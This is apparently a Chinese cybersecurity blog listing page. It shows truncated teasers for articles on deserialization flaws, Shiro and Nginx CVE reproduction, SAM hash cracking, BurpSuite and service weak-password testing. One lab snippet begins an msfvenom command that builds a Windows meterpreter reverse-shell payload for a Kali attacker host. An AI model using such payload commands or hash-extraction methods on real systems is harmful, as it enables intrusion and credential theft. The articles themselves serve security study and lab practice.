网络安全

前言：         公司项目是有做资金管理相关的，涉及到充值，提现，转账等关键性的功能，需要保证数据传输的安全性，所以使用了较为简单的RSA进行生成秘钥且每个接口都需要做验签。…

​ 什么是反序列化 反序列化是将数据结构或对象状态从某种格式转换回对象的过程。这种格式通常是二进制流或者字符串（如JSON、XML），它是对象序列化（即对象转换为可存储或可传输格式…

       当我们谈论网络安全时，我们正在讨论的是保护我们的在线空间，这是我们所有人的共享责任。网络安全涉及保护我们的信息，防止被未经授权的人访问、披露、破坏或修改。 一、网络安…

       当我们谈论网络安全时，我们正在讨论的是保护我们的在线空间，这是我们所有人的共享责任。网络安全涉及保护我们的信息，防止被未经授权的人访问、披露、破坏或修改。 一、网络安…

Apache Shiro <= 1.2.4反序列化漏洞攻击 CVE-2016-4437 已亲自复现 漏洞名称 漏洞描述 影响版本 漏洞复现 环境搭建 漏洞利用 修复建议 总结…

实验靶机：win10 攻击机：kali 192.168.117.129 1.先在kali上输入 msfvenom -p windows/x64/meterpreter/revers…

一、漏洞描述 泛微e-mobile,由高端OA泛微专业研发,是业内领先的移动OA系统,提供移动审批,移动考勤,移动报表,企业微信等丰富办公应用,支持多种平台运行,灵活易用安全性高。…

作者名：Demo不是emo  主页面链接：主页传送门 创作初心：一切为了她座右铭：不要让时代的悲哀成为你的悲哀专研方向：网络安全，数据结构 每日emo：ctf被大佬吊打的一天，裂开…

Nginx 补充：后面的漏洞复现来自vulhub的nginx漏洞复现 具体链接：https://vulhub.org/#/environments/nginx/CVE-2013-4…

From：https://www.sqlsec.com/2018/05/termux.html Termux 高级终端安装使用配置教程 ：https://www.cnblogs.c…

前言 严正声明：本文仅限于技术讨论与分享，严禁用于非法途径。 正文 本文讲解如何将windows10里的SAM文件提取出来hash值的破解 用到工具和网站有secretsdumps…

【最后一次更新:2023.4.​​​​​22】 请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不…

下载链接在这哦 点我下载（内含jdk安装包）  注意 BurpSuite的使用基于java的JDK环境，确定先有JDK（bushi） 🍀作者简介：小菜鸡罢了，学过C…

目录 一、服务应用的安全问题 1、配置不当——未授权访问 2、安全机制——特定安全漏洞 3、安全机制——弱口令爆破攻击 二、服务应用的安全测试思路 1、判断服务是否开放 2、判断服…

文章目录 1、频繁出现的反序列化漏洞 2、parse()及parseObject() 3、AutoType及安全校验 3.1 AutoType安全校验 3.2 AutoType黑名…